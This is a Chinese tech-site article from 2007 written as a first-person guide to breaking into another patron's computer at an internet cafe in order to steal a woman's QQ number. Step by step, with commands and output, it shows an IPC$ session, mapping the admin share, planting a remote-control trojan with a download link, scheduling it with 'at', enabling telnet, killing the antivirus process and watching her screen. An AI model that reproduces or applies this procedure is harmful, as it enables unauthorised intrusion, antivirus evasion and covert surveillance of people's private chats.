设为主页
收藏本站
资讯:
业界动态
|
软件动态
|
人物专栏
|
安全资讯
|
网络生活
|
电子商务
|
小游戏
|
视频
|
美女图片
|
音乐
网络编程
|
网站运营
|
网页制作
|
图形图象
|
操作系统
|
媒体动画
|
软件教学
|
网络应用
|
邮件系统
|
网络安全
|
认证考试
asp
|
.net
|
php
|
jsp
|
Sql
|
java
|
Dreamweaver
|
FrontPages
|
Javascript
|
css
|
Coreldraw
|
photoshop
|
Flash
|
Coreldraw
当前位置: >
主页
>
网络安全
>
安全防范
>
网吧入侵全攻略
最新新闻
·
机会与整合 边缘化互联
·
TOM-Skype新增三大本地
·
雅虎抢闸邮箱竞赛 网易
·
新浪抢攻北京奥运
·
洞悉网络口碑的掘金机会
·
拆解网络病毒黑金交易
·
木马下载器近期出现新变
·
《互联网周刊》第17期文
·
Web2.0是否催生自吹自擂
·
三张宝宝裸照招来MSN封
热门新闻
·
突破网吧及机房管理限制
·
简单装系统 打造64位系
·
解答64位Windows XP我关
·
特洛伊木马如何利用文件
·
谁敢乱动,用Windows窃听
·
反黑之路:渗透+分析+
·
结合VPN与无线AP增强安
·
局域网内服务器入侵的防
·
利用组策略轻松避开十种
·
启用SNMP服务后的安全防
推荐新闻
网吧入侵全攻略
作者:
来源:
it167
点击:
日期:
2007-01-27
在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……
这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……
无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..)
打开偶可爱的CMD..先net name下看看本机情况
WANGLU05
USER2000
命令成功完成。
我本机名是WANGLU05.ping下看看IP有无什么规则
Pinging wanglu05 [192.168.0.13] with 32 bytes of data:
Reply from 192.168.0.13: bytes=32 time<10ms TTL=64
Reply from 192.168.0.13: bytes=32 time<10ms TTL=64
Reply from 192.168.0.13: bytes=32 time<10ms TTL=64
Reply from 192.168.0.13: bytes=32 time<10ms TTL=64
IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.
这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.
Pinging WANGLU13 [192.168.0.225] with 32 bytes of data:
Reply from 192.168.0.225: bytes=32 time<10ms TTL=128
Reply from 192.168.0.225: bytes=32 time<10ms TTL=128
Reply from 192.168.0.225: bytes=32 time<10ms TTL=128
得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....
net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在...
只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.
G:/>net use //192.168.0.225/ipc$ "" /user:"user04"
命令成功完成。
如图1.
网吧系统盘为G盘.接着映射对方G盘为我本地Z盘.
G:/>net use z: //192.168.0.225/g$
命令成功完成。
如图2
现在我的电脑里多了一个Z盘...图3.
现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了...
本新闻共
4
页,当前在第
1
页
1
2
3
4
这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....
下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个
web控制台.体积没多大,205KB..下面是关于webserver的介绍./../
web控制台
一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。
可以在我网络盘里下到
http://fhod.ys168.com
综合工具里有个 webserver.rar
接着
G:/>copy webserver.exe //192.168.0.225/admin$
已复制 1 个文件。
G:/>net time //192.168.0.225
//192.168.0.225 的当前时间是 2005/2/5 下午 05:00
命令成功完成。
图4
G:/>at //192.168.0.225 17:02 webserver.exe
用AT命令启动webserver.exe.
2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...
FT....我说那.
难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..
还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...
本新闻共
4
页,当前在第
2
页
1
2
3
4
打开控制面板--管理工具--计算机管理
操作-连接到另一计算机.
然后输入IP192.168.0.225
图5
呵.等一会就可以看到成功了...你看到了什么?
更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.
图6
OK了...
本地打开一cmd
输入
G:/>telnet 192.168.0.225
回车后出现
Server allows NTLM authentication only
Server has closed connection
图7
需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.
ntlm.exe在《流光》的Tools目录中有的...
没工具怎么办呢..
我们在本地添加一和远程主机同样的用户名
输入
net user user04 /add 添加user04密码为空的用户
net localgroup administrators user04 /add 把user04加入管理员组
然后来到G:/Winnt/system32下找到CMD.exe
右击.创建快捷方式.然后在快捷方式 CMD右击..属性.
在以其他用户身份运行前打勾...
图8
然后运行
本新闻共
4
页,当前在第
3
页
1
2
3
4
快捷方式 CMD
弹出窗口.在用户名处输入user04密码为空
图9
然后
telnet 192.168.0.225
回车..哈哈...拿到shell了....
接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东
copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程
这下把瑞星给关了.还怕他提示有毒
接着执行webserver.exe
在IE里输入
192.168.0.225
图10
看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天...
好了她的QQ号码也拿到手了..加了她去聊聊去....
本新闻共
4
页,当前在第
4
页
1
2
3
4
【
文章评论
】 【
收藏本文
】 【
推荐好友
】 【
打印本文
】 【
论坛讨论
】
相关文章:
·
计算机加密反跟踪技术密文技术
·
掌控网络安全的魔戒
·
IE javaprxy.dll COM Object漏洞利用程序
·
网络防护层配置以及物理安全性
·
建立全面的网络安全体系
·
入侵检测系统高风险事件及其处置对策
文章评论:
(0条)
请留名:
匿名评论
点击查看所有评论
网管论坛
责任编辑:it167
声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。
设为主页
收藏本站
设为主页 收藏本站 
相关文章:
